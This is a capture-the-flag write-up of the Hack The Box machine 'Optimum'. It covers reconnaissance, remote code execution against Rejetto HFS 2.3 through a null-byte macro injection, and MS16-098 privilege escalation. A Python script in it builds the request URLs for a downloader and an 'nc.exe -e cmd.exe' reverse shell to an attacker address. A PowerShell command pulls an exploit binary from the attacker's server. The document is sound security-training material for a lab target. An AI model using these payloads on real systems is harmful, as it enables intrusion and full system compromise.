HacktheBox - Optimum Writeup

08/10/2019

Zero to OSCP Hero Writeup #8 - Optimum

Reconnaissance

1. Nmap Scan - TCP Scan 

Let's start with a TCP scan of the target IP address to determine which ports are open and which services are running on them:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.8

  • -sC: Run the default NSE script set (the "default" category) against the open ports
  • -sV: Detect the service version
  • -oA: Output the result in all three formats (normal, grepable, XML) as nmap/initial.tcp 

As you can see, only one port is open, port 80, which is running HttpFileServer 2.3, an outdated version of Rejetto HFS.

2. Nmap Scan - All TCP Ports Scan 

Okay, let's scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.8

  • -sC: Run the default NSE script set against the open ports
  • -sV: Detect the service version
  • -p-: Scan all 65535 TCP ports instead of nmap's default top 1000 
  • -oA: Output the result in all formats as nmap/full.tcp 

Okay, so this confirms that port 80 is the only TCP port open. 

3. Nmap Scan - All UDP Ports Scan 

We can do the same full port scan, but for UDP. Note that UDP scanning needs root, and a full 65535-port UDP scan of a single host can take hours because nmap has to wait for each probe to time out; for a first pass, --top-ports 100 or -F is usually enough: 

nmap -sU -p- -oA nmap/full.udp 10.10.10.8

  • -sU: Run the scan against UDP ports  
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp 

Enumeration

1. Enumerating Port 80  

Let's see what we encounter when browsing to the HTTP File Server:

On first impressions, the file server seems to be used to share and archive files over the network. There is also a login tab, which may be worth testing for default or reused credentials later. First, let's look more closely at the HttpFileServer 2.3 version itself.   

2. Enumerating HttpFileServer 2.3 version

Okay, so after checking Google and searchsploit, it turns out there are multiple exploits available for HFS version 2.3: 

searchsploit Http File Server 2.3

Let's look at the "HFS 2.3.x - Remote Command Execution (2)" Python script in more detail and work out what the exploit is actually doing:

 searchsploit -x exploits/windows/remote/39161.py

The payload strings in the script are URL encoded, so decoding them with a URL decoder makes the embedded VBScript and commands much easier to read.

Okay, let's concentrate on the three functions being called: 

  • script_create(): Writes a VBScript downloader, script.vbs, to C:\Users\Public on the target. When run, the script fetches nc.exe from the attacker's web server and saves it as C:\Users\Public\nc.exe. 
  • execute_script(): Uses cscript.exe on the target to run script.vbs, which performs the download. 
  • nc_run(): Runs the downloaded nc.exe with -e cmd.exe pointed at the attacker's IP and port, giving us a reverse shell on our waiting netcat listener.  

NIST's NVD entry for CVE-2014-6287 explains the root cause of the RCE: 

"The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action"

This is why every request the script sends starts with %00: the null byte stops HFS's macro-marker check from seeing what follows it in the search parameter, so the {.exec|...} macro placed after it is never stripped and is evaluated by HFS's macro engine, which runs the attacker's command on the server. 
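To make the three stages concrete, here is an added Python 3 example written for this writeup (it is not code from 39161.py, Exploit-DB or Rejetto). It rebuilds the three search requests the exploit sends, decodes them again so the null-byte prefix and macro are visible, and flags the same pattern in web-server log lines. It assumes the HFS macro syntax {.name|argument.} with the save and exec macros the exploit relies on; the target and attacker addresses, the listener port and the log lines are constructed sample values.

```python
"""Build, decode and detect HFS 2.3 %00 macro-injection search requests.

Added example for this writeup, not code from 39161.py itself. Assumes HFS
macros have the form {.name|arg|arg.} and that the 'save' and 'exec' macros
behave as the exploit expects. Addresses and log lines are constructed.
"""
import re
from urllib.parse import quote, unquote, urlsplit

# Assumed macro shape: {.name|argument.}; DOTALL because the VBScript argument
# spans several lines.
MACRO_RE = re.compile(r"^\{\.(\w+)\|(.*)\.\}$", re.DOTALL)


def hfs_macro_url(target, macro, *args):
    """Build http://<target>/?search=%00{.<macro>|<arg>|...} with each argument
    percent-encoded (spaces become %20) the way the exploit does it. The %00
    in front is the CVE-2014-6287 bypass for findMacroMarker."""
    encoded = "|".join(quote(a, safe="") for a in args)
    return "http://%s/?search=%%00{.%s|%s.}" % (target, macro, encoded)


def stage_urls(target, attacker_ip, attacker_port, web_port=80):
    """The three stages of the exploit: save a VBScript downloader, run it with
    cscript.exe, then launch nc.exe back to the attacker's listener."""
    vbs = (
        'dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")\r\n'
        'dim bStrm: Set bStrm = createobject("Adodb.Stream")\r\n'
        'xHttp.Open "GET", "http://%s:%d/nc.exe", False\r\n'
        "xHttp.Send\r\n"
        "with bStrm\r\n"
        "    .type = 1\r\n"
        "    .open\r\n"
        "    .write xHttp.responseBody\r\n"
        '    .savetofile "C:\\Users\\Public\\nc.exe", 2\r\n'
        "end with" % (attacker_ip, web_port)
    )
    script = r"C:\Users\Public\script.vbs"
    return [
        hfs_macro_url(target, "save", script, vbs),
        hfs_macro_url(target, "exec", "cscript.exe " + script),
        hfs_macro_url(target, "exec",
                      r"C:\Users\Public\nc.exe -e cmd.exe %s %d"
                      % (attacker_ip, attacker_port)),
    ]


def decode_stage(url):
    """Reverse the encoding: return (has_null_prefix, macro_name, argument)."""
    value = urlsplit(url).query.partition("search=")[2]
    decoded = unquote(value)
    has_null = decoded.startswith("\x00")
    match = MACRO_RE.match(decoded.lstrip("\x00"))
    if not match:
        return has_null, None, decoded
    return has_null, match.group(1), match.group(2)


def find_macro_injection(log_lines):
    """Defensive check: return the log lines whose search parameter decodes to
    a null byte together with an HFS macro marker."""
    hits = []
    for line in log_lines:
        for token in line.split():
            if "search=" not in token:
                continue
            decoded = unquote(token.partition("search=")[2])
            if "\x00" in decoded and "{." in decoded:
                hits.append(line)
                break
    return hits


# Constructed sample access-log lines (not taken from the target).
SAMPLE_LOG = [
    '10.10.14.9 - - [08/Oct/2019:12:00:01] "GET /?search=report.pdf HTTP/1.1" 200 512',
    '10.10.14.9 - - [08/Oct/2019:12:00:05] "GET /?search=%00{.exec|cmd.exe%20/c%20whoami.} HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for url in stage_urls("10.10.10.8", "10.10.14.9", 9001):
        print(url)
        print("   ->", decode_stage(url))
    print("flagged:", find_macro_injection(SAMPLE_LOG))
```

Running the script prints the three request URLs followed by their decoded (has_null, macro, argument) tuples, and then the one constructed log line that carries the injection pattern. The web_port argument of stage_urls matters in practice: the stage-one VBScript fetches nc.exe from whatever port it was built with, so the HTTP server on the attacker machine has to listen there.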

Initial Foothold - User 

1. Copy and Edit Exploit

Now that we have found the exploit we want to use via searchsploit, we need to copy it to our current directory:

 searchsploit -m exploits/windows/remote/39161.py

  • -m: Copy an exploit to the current working directory

As we now know that the exploit downloads nc.exe from our attacker machine, we need to locate nc.exe locally and start an HTTP server in its directory:

locate nc.exe 

cd /usr/share/windows-resources/binaries/

python -m SimpleHTTPServer 8000

We now need to edit the exploit and set the hard-coded attacker IP to our tun0 address and the listener port to the TCP port our netcat listener will use. Also check which port the VBScript in script_create() fetches nc.exe from (the Exploit-DB copy hard-codes port 80 on the attacker machine) and either serve nc.exe on that port or change it to match the web server started above:  

nano 39161.py

We can now start a netcat listener on port 9001:

nc -lvnp 9001

... And execute the exploit (the script is written for Python 2 and takes the target IP and port as arguments): 

python 39161.py 10.10.10.8 80

We now have a non-privileged shell on the target machine as the user kostas!  

We can now grab the user.txt flag!

more user.txt.txt

Privilege Escalation - Root  

Now we have an initial foothold on the machine, we need to elevate our privileges! 

1. Manually Checking for Priv Esc Route

I like to manually check things first before going for the automated scripts, and I recommend this Windows priv esc guide for OSCP. 

After going through various commands manually, there was nothing obvious that could help in gaining priv esc, so let's see what Windows Exploit Suggester can suggest. 

2. Windows Exploit Suggester

Okay, so let's grab the Python script from its GitHub page (note that it is a Python 2 script):

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Once we have it cloned on our machine, we need to update the database (this downloads the current Microsoft security bulletin spreadsheet) and install its xlrd dependency, as described in the readme: 

./windows-exploit-suggester.py --update

pip install xlrd --upgrade 

Before we can run the exploit suggester, we need to copy the output of the target's systeminfo command to our machine:

C:\Users\kostas\Desktop>systeminfo

Create a text file, systeminfo.txt, and paste the systeminfo output into it, then place it in the Windows-Exploit-Suggester directory on our machine.  

We also need to take note of the filename of the downloaded Excel database, as this is what the systeminfo.txt contents are compared against.  

We are now ready to run the python script! 

./windows-exploit-suggester.py --database 2019-10-08-mssb.xls --systeminfo systeminfo.txt

The script reports 246 potentially missing patches for this machine! Bear in mind that it only compares the OS version and the hotfix list from systeminfo against the bulletin database, so many of these will be false positives; each candidate still needs to be checked against the target's build and architecture (here a 64-bit Windows Server 2012 R2) before trying it. 

3. Using the MS16-098 exploit to Priv Esc

After reviewing multiple candidates, I eventually found that MS16-098 (a win32k kernel vulnerability) is a viable option for priv esc, and Exploit-DB 41020 provides it as an already compiled executable for 64-bit Windows 8.1 / Server 2012 R2. 

Lets download the exploit to our attacker machine: 

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Now that we have the exploit on our attacker machine, we need to get it onto the target, so we start another HTTP server: 

python -m SimpleHTTPServer 8001

On the target machine, we need to use a directory our current user has write access to (C:\Users\Public\Downloads works here) and download the exploit from our attacker machine. Note the URL is plain http://, since SimpleHTTPServer does not serve TLS: 

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.9:8001/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"

Now we can execute the exploit from the directory we downloaded it to: 

c:\Users\Public\Downloads\41020.exe

Sure enough... we are now running as NT AUTHORITY\SYSTEM, which we can confirm with: 

whoami

We can now grab the root flag from the Administrator's desktop! 

more root.txt 

What did I learn from Optimum? 

Patching and keeping systems and software up to date is critical! Both the foothold (an HFS version with a public RCE) and the priv esc (a missing kernel patch) on this box come down to unpatched software. 

Conclusion

And that is now 8 of the OSCP-like boxes completed, next up - Nibbles!